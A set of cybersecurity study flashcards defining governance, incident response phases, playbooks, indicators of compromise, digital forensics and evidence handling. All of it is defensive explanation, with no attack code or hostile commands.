Compensating controls should be tailored to the organization's specific security needs and should be regularly reviewed and updated to ensure they remain effective. Because they address specific risks, compensating controls should be evaluated individually and implemented with the same level of care and diligence as any other security measure.
Term
Configuration Management
Definition
Configuration management tracks and controls changes in a system's configuration. It is a critical component of security governance and often works as the cornerstone of systems management. Configuration management assists with planning, organizing, and controlling the development and maintenance of systems and services.
Configuration management helps security teams ensure that systems remain consistent, compliant, and secure. Organizations can ensure that their systems are up to date, reliable, and secure by implementing proper configuration management processes and tools. Configuration management also helps organizations maintain compliance with industry standards.
Term
Leadership and Management
Definition
Organizations are constantly growing, changing, and adapting, so leaders must be mindful of how this evolution impacts the cybersecurity program. Generally, as the organization changes, so must its security approaches and capabilities. Often, security teams and organizational leaders work independently from each other. This is a risk because the leadership teams may make decisions about operations that severely impact the environment's security. Likewise, when security teams work independently of operations teams, they may not fully comprehend the impacts their security-focused decisions have on staff productivity.
A classic example is merger and acquisition activity. When one organization acquires another, each organization may have different approaches to security. Leadership teams will be eager to integrate systems to streamline operations and reduce operating costs.
In contrast, security teams may push back on integration efforts until after security assessments and issues remediation activities are complete. Another example is changing business requirements stemming from new partnerships. A security team that has successfully managed security operations for many years may discover that they are subject to many new rules when the organization starts working with a defense contractor with stringent supply chain controls.
Term
memorandum of understanding (MoU)
Definition
Usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money.
A memorandum of understanding (MoU) is a legal document that outlines the terms and conditions of an agreement between two or more parties. It is an agreement that is not legally binding but serves as a document of understanding and good faith among the parties involved. A memorandum of understanding usually outlines the agreement's objectives and each party's duties and responsibilities.
The main purpose of a memorandum of understanding is to ensure that all parties involved in the agreement understand each other's expectations and obligations. It serves as a clear guide to the parties involved and helps ensure everyone is on the same page. It also serves as a reference point for the parties to use in a dispute.
Once the memorandum of understanding is signed, it is considered a binding document. Both parties must understand the terms and conditions of the agreement and make sure to adhere to its provisions. The memorandum of understanding should also be reviewed and updated regularly to ensure that everyone is still in agreement with the terms of the agreement.
An MoU might outline uptime, data access, response times, and other performance or access characteristics that conflict with the changes or maintenance tasks identified in response to mitigating vulnerabilities.
Term
service-level agreement (SLA)
Definition
Operating procedures and standards for a service contract.
A service-level agreement (SLA) is a legally binding contract between two or more parties that defines the level of service to be provided by one party to another. It often governs the relationship with a third-party service provider. It outlines the services provided, the terms of service, the responsibilities of each party, and the penalties for failing to meet them. It is essential to have a service-level agreement in place when providing any service, as it serves to protect both parties and helps to manage expectations.
The service-level agreement should detail the services to be provided, including the quality of service, the response time, the cost, and other relevant information. It should also specify the time frame for the service delivery, the contact information for both parties, and the payment terms. It should also define the performance metrics used to measure the quality of the service.
Term
Organizational Governance
Definition
Organizational governance is the system of rules, practices, and processes an organization uses to control its operations and the strategic direction it pursues. It defines the roles and responsibilities of the board of directors, management, and other stakeholders in achieving the organization's objectives. Organizational governance aims to ensure that the organization is well managed, accountable, and compliant with applicable regulatory requirements. It also helps to ensure that the organization is guided by a set of values and principles consistent with its mission and objectives.
Organizational governance begins with the board of directors. The board of directors is responsible for setting the organization's overall direction, setting policies and procedures, and overseeing the organization's management. The board of directors is also responsible for setting the prevailing standards for organizational governance, such as selecting leaders, creating ethics policies, establishing a code of conduct, and monitoring operational performance.
In addition to the board of directors, other stakeholders, including shareholders, regulators, and the public, are involved in organizational governance. Shareholders are responsible for ensuring that the organization is accountable to them and that their investments are responsibly managed. Regulators ensure that the organization complies with applicable laws and regulations. The public is responsible for holding the organization accountable for its actions and ensuring that it follows its mission and objectives.
The dynamics and pressures of organizational governance often overshadow security initiatives. When new investments in security tools and software have high costs or security teams want to slow down operations to perform security evaluations and other similar activities, the board of directors may push back and override these plans. Security initiatives can often disrupt existing strategic plans, cause conflicts in the governance board, and upset stakeholders.
Term
Business Process Interruption
Definition
A business process interruption describes a disruption in an organization's normal operations. Disruptions can cause minor or significant impacts. Events such as natural disasters, power outages, technical glitches, human error, breaches, or cyberattacks, can cause business process interruptions. The interruption can affect any aspect of an organization's operations, from product and service delivery to internal operations and customer service.
Business process interruptions can significantly impact a business's bottom line. Financial losses can occur due to lost revenue, increased costs, and missed opportunities. Furthermore, interruptions can negatively impact customer service, employee morale, and brand reputation. The costs of a business process interruption can be far-reaching, with the potential to cause long-term damage to a company's reputation and profitability.
Term
Degraded Functionality
Definition
Degraded functionality is an issue that often arises in software and hardware. It occurs when system performance decreases due to various factors, such as environmental changes, age, lack of maintenance, and sometimes from applying security patches. It can also result from a design flaw, lack of resources, or inadequate testing.
Degraded functionality causes employee frustration, decreased efficiency, reduced performance, and increased costs due to repairs and replacements. Furthermore, it can cause safety issues due to the system's inability to perform as required.
Term
Legacy Systems
Definition
Legacy systems are outdated systems or software applications that have been in use for an extended period. Legacy systems are built on obsolete technologies and struggle to keep up with changing technological trends. As such, these systems often need significant help to meet modern security requirements, if that is even possible. Despite this, many organizations still rely on legacy systems and are reluctant to replace them due to the cost and complexity associated with the transition.
Legacy systems are rarely updated and often contain code that is difficult to maintain. As such, they are often vulnerable to security threats. Moreover, these systems often lack the ability to integrate with newer platforms, which is a significant problem for organizations that need to grow and adapt their capabilities to changing operating requirements.
Modernizing legacy systems is frequently daunting, and upgrades require significant time, money, and resources to migrate data and make changes to the code.
Term
Proprietary Systems
Definition
Proprietary systems are specialized systems designed to serve a specific purpose and are tailored to an organization's needs. Proprietary systems can range from simple software programs to complex networks and databases. A company or organization often develops proprietary systems to provide a unique solution to a specific problem or challenge. They are often developed in-house, with the organization's staff, rather than using outside vendors. This allows the organization to control the system and ensure it meets its specific needs. In-house developed software depends on the skill and productivity of its own developers.
When security vulnerabilities are identified in these systems, they often create overwhelming trouble for in-house teams. Security changes are often complicated and depend on the application's architectural structure. Poor architectural design choices made early in development can create huge problems when security changes are needed
Term
Incident response plans (IRP)
Definition
Specific procedures that must be performed if a certain type of event is detected or reported.
Term
Preparation Incident response plans (IRP)
Definition
1.Make the system resilient to attack in the first place. This includes hardening systems, writing policies and procedures, and setting up confidential lines of communication. It also implies the creation of incident response resources and procedures.
Term
Detection and Analysis Incident response plans (IRP)
Definition
Determine whether an incident has taken place and assess how severe it might be (triage), followed by notification of the incident to stakeholders.
Term
Containment Incident response plans (IRP)
Definition
Limit the scope and magnitude of the incident. The principal aim of incident response is to secure data while limiting the immediate impact on customers and business partners.
Term
Eradication and Recovery Incident response plans (IRP)
Definition
1.Once the incident is contained, the cause can be removed and the system brought back to a secure state. The response process may have to iterate through multiple phases of detection, containment, and eradication to effect a complete resolution.
Eradication and Recovery Phase
Remove causes of incident from hosts and networks.
Sanitize infected media devices.
Reconstruct/reimage hosts.
Reconstitute hosts and services.
Re-secure hosts and networks (patching, permissions, logging, hardening).
1.Analyze the incident and responses to identify whether procedures or systems could be improved. It is imperative to document the incident. This phase is very commonly referred to as lessons learned. The outputs from this phase feed back into a new preparation phase in the cycle.
Post-incident Activity Phase
Prepare incident summary reports for stakeholders.
Conduct lessons learned/after action meeting.
Create after action report with summary and recommendations.
Post-incident Feedback Informs Preparation
Implement recommendations from lessons learned.
Improve incident response policies, procedures, and resources.
Term
Incident Response Policies
Definition
§Statements of the organization's expectations and procedures for responding to security incidents. These policies typically describe which incident types must be reported and should provide detailed descriptions of the steps to be taken in the event of an incident, the roles and responsibilities of those involved, and the communication protocols to be followed. The organization should also develop a timeline for responding to incidents, including the timeline for reporting and responding to them. It should also include a timeline for determining the cause of the incident, the recovery process, and the steps to prevent similar incidents in the future.
Term
Incident Response Procedures
Definition
Describe organizations' actions during incident response. These procedures include the protocols for how different parts of the organization work together to mitigate incidents and the procedures for how individuals should respond.
Term
Ransomware
Definition
A ransomware playbook describes the people, processes, and tools to be employed during such an event and should include considerations for determining which systems were impacted, methods by which impacted systems can be immediately isolated, and an identification and engagement with the people needed in the response. Ransomware responses should include disconnecting and isolating networks as quickly as possible. It is preferable to disconnect systems as opposed to powering off in order to maintain forensic integrity as well as potentially being able to extract cryptographic keys from system memory which can be used for remediation.
Term
Data Exfiltration
Definition
Used in response to an adversary that has targeted, copied, and transferred sensitive data. Data exfiltration can use many avenues, from literal movement of data files to less obvious examples such as is accomplished via an SQL injection attack. Data exfiltration playbooks include the specific and necessary tasks needed in response to data exfiltration, including notification requirements and system and network forensic analysis to determine exactly what was accessed. Sometimes analysis can reveal the locations where data was copied which can help in response decisions. Deleting copies of data on an adversary's system is considered to be a hack-back action, and (ironically) probably illegal. Regardless, deleting data in this way provides only limited mitigation depending on whether additional copies of the data exist in other locations.
Term
Social Engineering
Definition
A social engineering playbook often involves responses in relation to an identified, phishing email. As soon as a suspicious email is identified, an official notice should be broadcast to advise of the attack and to encourage others who may have responded to the email to step forward. In parallel, the phishing email should be searched for within the entire email system to identify any other instances, and any elements within the email (such as dynamic body content, hyperlinks, and/or attachments) should be analyzed within a sandbox to fully understand what the message is designed to do. Information extracted from sandbox analysis can be used to feed security infrastructure such as blocking access to IP addresses and URLs as well as crafting updated detection rules in IDS, AV, etc. At a bare minimum, impacted individuals should have their passwords reset and possibly also have their desktop systems replaced.
Term
Incident Response Tools and Resources
Definition
These describe the wide range of specialized tools needed during an incident response.
Security Information and Event Management (SIEM)—Collect and analyze log data, provide a single viewpoint for logs collected from many sources. Help to locate specific events or event sequences.
Intrusion Detection Systems (IDS)—Provides alerts when suspicious events occur based on established signatures or customcrafted signatures developed to locate events specific to an incident.
Vulnerability Scanners—Identify the presence of a vulnerability, especially one under active attack; can also provide assurance that a previously identified vulnerability has been remediated.
Netflow Analyzers—Provide high-level visibility into the volumes of traffic and protocols in use in the environment.
Infrastructure Monitoring—Tools used to monitor availability, latency, capacity, and other elements. Typically associated with engineering teams and used to ensure the health and uptime of infrastructure components such as servers, storage environments, and network equipment.
Proxies and Gateways—Firewalls, routers, and forward proxies (Internet traffic) provide valuable insight into traffic leaving and entering the network. These can be used to alert on specific traffic or analyzed to locate historical events.
Term
Definition
Term
Identification of Potential Threats and Incidents
Definition
Threat modeling, risk analysis, and other threat identification activities can help organizations identify potential threats and incidents that could impact the organization. Incident types include cyberattacks, natural disasters, and other events that could disrupt normal operations. Threat modeling tools can help organizations create threat models and analyze identified threats and incidents comprehensively by creating detailed diagrams that support team collaboration.
Term
Assessment of Potential Impacts
Definition
Organizations use risk analysis and impact assessments to measure the scope of identified incidents on the organization. Risk analysis tools include guided questionnaires and templates designed to help individuals collect information and produce detailed reports on their findings.
Term
Creation of Response Plans
Definition
Organizations create response plans to handle incidents based on the threats and incidents identified during risk assessment activities. Response plans should leave little to the imagination. They should be concise and direct, with detailed steps and clear expectations. Flowcharts are a popular tool in the incident response arsenal.
Term
Testing of Response Plans
Definition
Organizations test response procedures to ensure that personnel know how to respond to specific incidents and that the responses are effective.
Term
Tabletop Exercises
Definition
Tabletop exercises are a type of incident response planning activity that does not involve a mock incident or full incident simulation. During tabletop exercises, organizations bring together the personnel who would respond to an incident, often in a simulated setting, to test the effectiveness of their communication and response plans.
Term
Mock Incidents
Definition
Scenario-based simulations that organizations create to test how the incident response plan actually works in practice. Mock incidents can include simulations of different types of incidents that might occur, such as earthquakes or malicious cyberattacks.
Term
Full incident simulations
Definition
Mock incidents that include the full set of people and organizations involved in responding to an incident, to test the entire response process, including communication protocols and the effectiveness of the different response teams.
Term
Antimalware software
Indicators of compromise (IoCs)
Definition
An alert is generated when a virus signature is detected on a host system.
Term
Network intrusion detection system/network intrusion prevention system (NIDS/NIPS)
Indicators of compromise (IoCs)
Definition
An alert is generated after an automated port scan is detected.
Term
Host intrusion detection system/host intrusion prevention system (HIDS/HIPS)
Indicators of compromise (IoCs)
Definition
An alert is generated after the cryptographic hash of an important file no longer matches its known, accepted value.
Term
System logs
Indicators of compromise (IoCs)
Definition
Entries in the Windows event log indicate a log-on with new credentials that was allocated special privileges.
Term
Network device logs
Indicators of compromise (IoCs)
Definition
An entry in the firewall log indicates a dropped connection intended for a blocked port.
Term
Security information and event management (SIEM)
Indicators of compromise (IoCs)
Definition
An alert is generated if anomalous behavior is detected in any relevant logs.
Term
Flow control device
Indicators of compromise (IoCs)
Definition
A higher amount of traffic than normal across the network indicates an attempted denial of service (DoS) condition.
Term
Internal personnel
Indicators of compromise (IoCs)
Definition
Employee testimony indicates a possible breach in progress.
Term
People outside the organization
Indicators of compromise (IoCs)
Definition
An external party claims to be responsible for an attack indicates that this is the case.
Term
Cyber-threat intelligence (CTI)
Indicators of compromise (IoCs)
Definition
Third-party research and vulnerability database information indicates a new threat that could be targeting your organization.
Term
Triage Event
Definition
Properly determining the scope of a security incident occurs during triage. Triage work is dependent upon the skills and knowledge of the individuals performing the work and includes careful curation of the data and tools useful in locating any indicators of compromise. Individuals performing this work should have specialized training and experience in a live system and digital forensics as well as memory and malware analysis.
Triage work is often performed on endpoints, within executable and binary files, and using enterprise security infrastructure tools such as SIEM. Ultimately, triage work is focused on determining a timeline of what, where, how, and when events occurred.
Having clearly defined processes, thresholds, and notification procedures in place as part of a security incident pre-escalation plan is imperative to rapid response. The lack of a clear plan regarding what constitutes an urgent situation or knowledge of what to do when a situation is identified will result in problems being stuck in ticket queues or bogged down in bureaucracy while an adversary furthers the impacts of their attack.
Term
playbooks
Definition
A checklist of actions to perform to detect and respond to a specific type of incident.
Incident response playbooks are an invaluable tool for organizations to quickly and efficiently respond to security incidents. With an incident response playbook, organizations define the steps they need to take to respond to a security incident, such as the specific roles, processes, and procedures that security staff must follow. Incident response playbooks also guide communication with stakeholders and the public, as well as guide how to gather evidence and determine the incident's root cause.
Oftentimes the playbook is just that—a physical book used by a security analyst in response to an incident. Using a physical book ensures its availability during a wide-scale incident. In a highly secure environment, it also ensures the IR capabilities are not digitally exfiltrated by the attackers.
The most effective incident response playbooks are tailored to an organization's specific security needs and provide detailed guidance on responding to various security incidents. For example, a playbook may contain detailed instructions on responding to a ransomware attack or a data breach. Additionally, the playbook should include guidance on the necessary steps to contain the incident, such as isolating affected systems, and measures to ensure the incident is fully resolved.
When creating an incident response playbook, organizations should ensure they have the right level of detail and that all necessary stakeholders are involved, including security teams, IT staff, legal teams, and other personnel who may be involved in responding to the incident. Organizations should update the incident response playbook as new threats and technologies emerge.
Term
Communication Plan
Definition
A secure method of communication between the IR team members is essential for successfully managing incidents. The team may require "out-of-band" or "off-band" channels that attackers cannot intercept. In a major intrusion incident, using corporate email or VoIP runs the risk that the adversary can intercept communications. One obvious method is via smartphones, but ideally, the messaging system should support end-to-end encryption, digital signatures, and encryption keys supplied by a system independent of the identity and access management systems used by the attacked environment.
Term
Forensic Process
Definition
Incident investigation requires analysis techniques designed to reveal the details of what happened. Forensic techniques are a critical component of the investigation. Broadly, forensic techniques look closely at the inner workings of devices, operating systems, and applications to reveal a detailed sequence of events. A sequence of events supported by forensic analysis helps the IR team improve the response to future incidents.
Digital forensics is highly specialized and complicated work, and entire books and certification exams are devoted to the topic. Regarding incident response, it is important to understand that the forensic process supports an investigation by providing specific details regarding an event.
Term
Lessons Learned
Definition
An analysis of events that can provide insight into how to improve response and support processes in the future.
Term
Incident Response Plan Update
Definition
The conclusions of the lessons learned report should drive changes to incident response. This might involve small tweaks to procedures, better explanations or greater clarity for incident handlers, new templates for communicating with trusted parties, or major changes to the security controls used. Updates to incident response procedures require updated training and testing programs.
Term
business continuity (BC)
Definition
A collection of processes that enable an organization to maintain normal business operations in the face of some adverse event.
In short, business continuity (BC) describes the efforts the organization takes to keep the organization running during and after a disaster event. It describes how the organization continues to operate in the face of significant adversity and the effort needed to work through the event and then restore operations to normalcy. Bringing systems back online is part of the objective; returning things back to normal takes more time. For example, employees may need to complete or track work using alternative methods during a disaster. At some point, that information will need to be entered into the systems that were unavailable during the disaster. If the organization had to operate out of an alternative facility, all of the people and equipment will need to move back after the event passes. These activities are part of the business continuity plan.
Term
Disaster recovery (DR)
Definition
A documented and resourced plan showing actions and responsibilities to be used in response to critical incidents.
Disaster recovery (DR) is a component of an overall business continuity plan. Disaster recovery plans focus on the immediate needs of a disaster when things are the most frantic and pressing. The tasks required to bring critical systems back online are the most crucial issue—for example, recovering systems after a wide-scale ransomware infection. Disaster recovery describes the efforts taken to restore infected systems to a safe operating state.
Term
summary list of some common indicators of compromise
Definition
§Atypical or unusual inbound and/or outbound network traffic
§Administrator, root, or other highly privileged accounts being used in any unexpected way
§Any account activity representing access or actions which should not be possible using the identified account
§A high volume of invalid password entries
§Unexpected increases in traffic volumes, especially database or DNS traffic
§High volumes of requests to access a single file
§Suspicious changes to the Windows registry or any unusual change to system files
§Atypical requests to Domain Name Servers (DNS) or strange domain name resolution requests
§Any unauthorized changes to system settings and/or mobile device profiles
§Large quantities of compressed files stored in unexpected locations
§Traffic originating from countries where the organization does not operate or have any business dealings
§Any strange or unknown applications running on a system
§Any unknown or suspicious scheduled tasks
§Strange or unknown processes running on a system
§Strange or unknown services installed on a system
§Alerts from IDS/IPS, firewalls, endpoint protection, or any other security tools
§Any unexpected instances of encrypted files
§Any activity on a system that indicates remote access/control that is not expected
Term
digital forensics
Definition
The process of gathering and submitting computer evidence for trial. Digital evidence is latent, meaning that it must be interpreted. This means that great care must be taken to prove that the evidence has not been tampered with or falsified
Term
Identification
digital forensics
Definition
·Ensure that the scene is safe. Threat to life or injury takes precedence over evidence collection.
·Secure the scene to prevent contamination of evidence. Record the scene using video and identify witnesses for interview.
·Identify the scope of evidence to be collected.
Term
2.Collection
digital forensics
Definition
·Ensure authorization to collect the evidence using tools and methods that will withstand legal scrutiny.
·Document and prove the integrity of evidence as it is collected and ensure that it is stored in secure, tamper-evident packaging.
Term
3.Analysis
digital forensics
Definition
·Create a copy of evidence for analysis, ensuring that the copy can be related directly to the primary evidence source. The integrity of evidence copies are verified by generating hashes of the files on a recurring basis in order to detect any unintended changes.
·Use repeatable methods and tools to analyze the evidence.
·Analyze evidence using tools which are known to produce trustworthy and legally defensible results. A list of tested forensic tools is available from NIST at https://www.nist.gov/itl/ssd/software-quality-group/computer-forensics-tool-testing-program-cftt.
Term
Reporting/Presentation
digital forensics
Definition
·Create a report of the methods and tools used and present findings and conclusions in accordance to the specific reporting requirements necessary (and dependent upon the type of incident).
Term
Data Acquisition
Definition
Data acquisition describes obtaining a forensically clean copy of data from a device held as evidence. Data acquisition often requires specialized software or equipment to create a disk image from the target device. The image can copy volatile or nonvolatile storage, and a system memory snapshot (memory dump) is also often created to aid in later analysis. Evidence capture prioritizes collection activities based on the order of volatility, initially focusing on highly volatile storage.
Term
Order of Evidence Collection
Definition
CPU registers and cache memory (including cache on disk controllers, GPUs, and so on)
Contents of system memory (RAM), including the following:
Routing table, ARP cache, process table, kernel statistics
Temporary file systems/swap space/virtual memory
Data on persistent mass storage devices (HDDs, SSDs, and flash memory devices)—including file system and free space
Remote logging and monitoring data
Physical configuration and network topology
Archival media
Term
Evidence Preservation
Definition
The host devices and media taken from a crime scene should be labeled, bagged, and sealed using tamper-evident bags. It is also appropriate to ensure that the bags have antistatic shielding to reduce the possibility of data being damaged or corrupted on the electronic media by electrostatic discharge (ESD). Each piece of evidence should include a chain of custody form that records where, when, and who collected the evidence, who subsequently handled it, and where it was stored.
The evidence should be stored in a secure facility with physical access and environmental controls, so that condensation, ESD, fire, and other hazards do not damage the electronic evidence. Similarly, transport methods must also be secure if the evidence is moved.
Data validation techniques are essential for digital evidence, such as mass storage devices. Hashing is used to validate data integrity. For example, forensic analysts will generate the hash value of a disk drive before performing any analysis. The hash is extremely important because it allows a forensic analyst to make copies of evidence and prove the copies are exact. By comparing the hash values of the original evidence to the forensic copy, the analyst can confirm they are identical (so long as the values are the same). By regenerating the hash periodically, a forensic examiner can prove that evidence has not been modified during analysis.
Term
chain of custody
Definition
Record of evidence-handling from collection to presentation in court to disposal.
The chain of custody is the record of evidence handling from collection through presentation in court. The evidence can be hardware components, electronic data, or telephone systems. The chain of custody documentation reinforces the integrity and proper custody of evidence from collection, to analysis, to storage, and finally to presentation. When security breaches go to trial, the chain of custody protects an organization against accusations that evidence has either been tampered with or is different than it was when it was collected. Every person in the chain who handles evidence must log the methods and tools they used.
Term
legal hold,
Definition
A process designed to preserve all relevant information when litigation is reasonably expected to occur
A legal hold, or litigation hold, describes the notification received by an organization's legal team instructing them to preserve electronically stored information (ESI) and/or paper documents that may be relevant to a pending legal case. Legal hold authority can be complicated by jurisdiction, but these details are managed by legal teams. It is imperative that the cybersecurity team be notified of legal holds as soon as possible in order to ensure data is preserved in accordance with the order. Legal hold requirements often exceed the data protection and retention periods ordinarily in place.
Term
e-Discovery
Definition
Procedures and tools to collect, preserve, and analyze digital evidence.
e-Discovery describes the electronic component of identifying, collecting, and providing the electronically stored information (ESI) identified by a legal hold. The scope of information included in e-Discovery can be vast and include everything from files, emails, logs, text messages, voicemail, databases, and social media activity. The scope of information requested in an e-Discovery request can be difficult for many organizations to comply with. For organizations that are involved in regular legal activities, generally large organizations and government, specific strategies are often employed to defend against e-Discovery requests. Defenses often include well-crafted data retention policies that define stringent periods for which data can be retained. However, data retention policies cannot conflict with existing laws that dictate retention periods.
Term
Organization Impact versus Localized Impact
Definition
The scope of an incident is a straightforward way of assessing its impact. A localized impact means that the scope is limited to a single department, small user group, or one or two systems. An organization impact is one that affects mission essential functions, meaning that the organization cannot operate as intended. Along with the scope, the duration of the impact will have a substantial effect on costs. From the perspective of incident response, the scope and duration of an event might not be obvious. It is important to reevaluate the impact as new facts emerge and to be prepared to escalate response procedures if the scope or duration seem likely to expand.
Term
Immediate versus Total Impact
Definition
Immediate impact refers to direct costs incurred because of an incident, such as downtime, asset damage, fees, penalties, and other costs. Total impact relates to costs that arise following the incident, including damage to the company's reputation and brand value.
Term
Containment
Definition
Isolation is a mitigation strategy applied to many incident types. Isolation involves removing an affected component from the environment in which it participates—for example, removing a server from the network after it has been attacked or disabling a router interface to prevent the spread of malware outside of a department. Isolation could also refer to disabling a user account or application service.
The chosen isolation method directly impacts forensic analysts and can potentially violate established policies or SLAs. Selecting the right approach to containment depends upon balancing these requirements with the risks associated with inaction. Incident responders must carefully document and timestamp all actions to support post-incident investigations.
§Ensure the safety and security of all personnel. The first concern of all managers involved with the security response is the safety and security of personnel.
§Prevent further damage. This will be the overriding priority after the identification of the compromise.
§Identify whether the intrusion is a primary or a secondary attack (part of a more complex campaign).
§Avoid alerting the attacker that they have been discovered.
§Preserve forensic evidence of the intrusion. While waiting for the forensics analyst to arrive, treat the system like any crime scene by preventing anyone from further compromising the system or destroying evidence.
Term
Reimaging
Definition
One method of restoring a system after a breach or infection is reimaging it using a known clean backup or disk image created before the incident. A "clean" backup or image has appropriate secure baseline configurations, is fully patched, and does not contain malware. Depending on when the system was initially breached, backups may contain malware, backdoors, or other artifacts which would allow the attacker to regain access quickly. Any system infected with malware should be reimaged instead of trusting that antimalware tools can effectively "clean the infection." Malware is complicated and stealthy, and removal is often a complex task.
Term
Recovery
Definition
Eradicating malware, backdoors, and compromised accounts from individual hosts is not the last step in incident response. You should also consider a recovery phase (or sub-phase) where the goal is restoration of capabilities and services. This means that hosts are fully reconfigured to operate the business workflow they were performing before the incident. The steps you take to recover from an incident will depend greatly on the nature of the incident, as well as the ways in which you prepared for such an incident. The following are some examples of incident recovery:
§If a malicious user deletes data from a database, you can restore that data if you had been creating backups. A continuous 1:1 replication of that data will require minimal effort on your part, but backups made in time intervals may leave some data incomplete or irrecoverable. If possible, identify what you can about the data that was lost in the period since the last backup was performed.
§If a distributed denial of service (DDoS) takes down your web servers, you may need to manually reboot your servers and perform a health check on them before pushing them back to live status. They should accept incoming connections gradually rather than all at once to prevent the servers from overloading again. If you identified the source or sources of the malicious traffic, you can also have the servers filter them.
§If an employee accidentally downloads malware onto their workstation, you can attempt to remove it with antimalware software. If the malware persists, you may need to wipe the entire hard drive and reinstall the operating system. You can only truly recover once the malware is completely gone from the system, and the user is trained to be more security aware.
An essential part of recovery is the process of ensuring that the system cannot be compromised through the same attack vector (or failing that, that the vector is closely monitored to provide advance warning of another attack).
Term
Remediation
Definition
Remediation describes the corrective actions taken to address a problem or issue permanently. This often involves replacing faulty hardware or software or implementing new procedures to prevent similar issues from occurring in the future. Remediation requires using the outputs of root cause analysis to correctly identify the fix that prevents the issue from happening again. This is significantly different from "fixing," which focuses on simply making things work again.
For example, if an attack used a software or firmware exploit, the target system (and other systems with the same vulnerability) must be patched (if a patch exists). Root cause analysis would seek to determine why the systems were unpatched in the first place and how the attack was able to access the vulnerable systems. So while recovery efforts focus on restoring things back to normal, remediation describes how lessons learned and root cause analysis is incorporated into policies, procedures, and technological improvements to ensure the problem does not reoccur.
Term
Compensating Controls
Definition
A compensating control serves the same purpose as the recommended control and affords the same (or better) level of protection but uses a different methodology or technology. Leadership must approve the control's deployment and require detailed documentation to show that the compensating control is deployed as part of the process, is applied consistently by employees, and is monitored for effectiveness.
The need for a compensating control may be because the primary control is too expensive, needs more qualified staff to operate it, or is incompatible with a critical application or platform.
Term
Stakeholder Management
Definition
Stakeholders describe any individual, group, or organization that can affect, be affected by, or perceive itself to be affected by a decision, activity, or outcome relating to an incident. Identifying stakeholders is the first step toward successful stakeholder management, as they are not always obvious. It is vital to identify, analyze, and prioritize stakeholders' perspectives, expectations, and interests. These will dictate the communication methods and the content of the message.
After identifying stakeholders, it is essential to develop effective communication strategies to address their needs and interests. Building strong relationships with stakeholders is crucial and is accomplished by providing accurate and timely information, listening to feedback, and responding to requests. Effective communication helps to manage expectations, resolve conflicts, and foster collaboration.
Regular communication with stakeholders should be part of the incident response process to ensure they know the status of the incident. The method of communication depends upon the stakeholder and could include face-to-face meetings, emails, text/chat messages, telephone calls, or video conferencing. Incidents impact stakeholders, and their areas of responsibility may be shaped by their knowledge of the incident. Keeping stakeholders informed helps them manage their responsibilities (affected by the incident) and often reveals information the responders may not have previously known, such as alternative processes, business relationships, impacts, and consequences.
Term
Incident Declaration and Escalation
Definition
Incident declaration and escalation are critical components of incident response. It is the process of recognizing and officially declaring an event as an incident, as well as the process of escalating the incident to the appropriate personnel.
The first step in incident declaration and escalation is identifying an incident, such as recognizing a potential security event and confirming that it constitutes a verified security incident. The category of "incident" is broad and includes everything from full-scale data breaches to something as simple as a protected document printed inappropriately.
After identifying and confirming a security incident, the next step is the official declaration of the event as an incident. Incident declaration includes documenting the incident details, including its severity, and notifying the appropriate personnel via escalation procedures.
Depending on the type of incident, there may be multiple escalation levels. For instance, in a data breach, the incident may need to be escalated to executive management. Alternatively, if the incident is an attempted intrusion, it may need to be escalated to IT staff or a security operations center. An incident must be declared or escalated to the appropriate personnel for it to be properly addressed. Unaddressed incidents will likely result in significant future issues, jeopardizing the organization's security.
Term
Data exfiltration
Definition
The process by which an attacker takes data that is stored inside of a private network and moves it to an external network.
Term
Insider Data Exfiltration
Definition
§An employee or ex-employee perpetrates the attack using access permissions provided as part of their job.
Term
Device Theft/Loss
Definition
§A device is lost or stolen. Even with encryption and strong authentication protecting it, device theft/loss must be treated as a suspected breach.
Term
Accidental Data Breach
Definition
Human error or a misconfiguration leads to data being made public or sent to unauthorized recipients. This scenario has occurred more frequently as organizations use public cloud storage platforms for data.
Term
Integrity/Availability
Definition
Most data breaches impact the confidentiality of the information. Attacks that compromise the availability (destruction of systems-processing data) and integrity (modification of database records, for instance) are also likely to require regulatory notification and reporting.
Term
executive summary
Definition
A part of the written report that is a high-level and concise overview of the penetration test, its findings, and their impact.
The executive summary should provide a brief overview of the document, including the purpose, key points, and conclusion. It should include relevant background information to provide context for the rest of the document. It is important to remember to include the main points in the executive summary to ensure that readers can understand the report without having to read the entire document. The executive summary should be clear and concise but still provide enough detail to give readers a good understanding of the report's contents.
An executive summary should be tailored to its audience and written in a way that will be accessible to them. When writing an executive summary, it is crucial to be specific and concise. Keep in mind the length limit of the executive summary and avoid adding unnecessary detail. An executive summary should be written in a professional tone and should not contain any opinion or bias.
Term
timeline
Definition
In digital forensics, a tool that shows the sequence of file system events within a source image in a graphical format.
a timelineof events is designed to provide a chronological sequence of significant events or dates visualized in a graph or chart format.
Term
Impact
Definition
Impact describes how a security incident affects an organization's operations, data, personnel, or reputation and is typically measured in terms of costs, downtime, loss of customer trust, or other factors.
Term
Scope
Definition
The scope is an assessment of the potential impact of an incident. It identifies the magnitude of the incident and the resources needed to restore services. It operates as a measure to guide the prioritization and management of the resources necessary to ensure an efficient response.
Term
Evidence
Definition
Incident evidence is any information collected during the investigation that can provide clues to help identify the attack and explain the circumstances surrounding it. Physical evidence, log data, forensic reports, witness statements, surveillance footage, and audio recordings are all examples of evidence.
Term
Recommendations
Definition
Incident response recommendations include details regarding what to do in response to the incident. Some of the suggestions will be in direct response to containing the immediate damage, but others may focus on longer-term objectives. The recommendations must be specific and actionable, and the decisions made in response to them must be measured and tracked to demonstrate their successful completion.
Some examples of recommendations may include the following:
§Replace outdated desktops.
§Add additional licensed features to a security product.
§Remove access permissions to specific assets.
§Prohibit the use of personal devices.
§Increase security awareness training frequency.
§Change specific elements of the patch management policy.
§Prohibit access to specific websites.
§Monitor user activity in additional ways.
§Disable specific types of accounts.
§Reset passwords.
§Implement multifactor authentication (MFA).
Lessons learned and after-action reports are valuable sources of information to identify recommended changes. It could be that the teams responsible for incident response were slow to act, made mistakes, or needed to be more coordinated. Recommendations should address these problems, and leadership teams need to identify ways to measure improvements and provide assurance that changes are incorporated. Response time and mean time to recover are popular measures used to evaluate the effectiveness of incident response teams. When response and recovery times show a downward trend, this generally implies improvements but requires complete analysis.
Term
Root cause analysis
Definition
A technique used to determine the true cause of the problem that, when removed, prevents the problem from occurring again.
Root cause analysisis an investigative technique used to identify the underlying cause of a problem. It is a systematic process used to determine the most fundamental cause of a problem and its consequences. This process is used to identify what went wrong and why and then take corrective action to prevent similar issues from occurring.
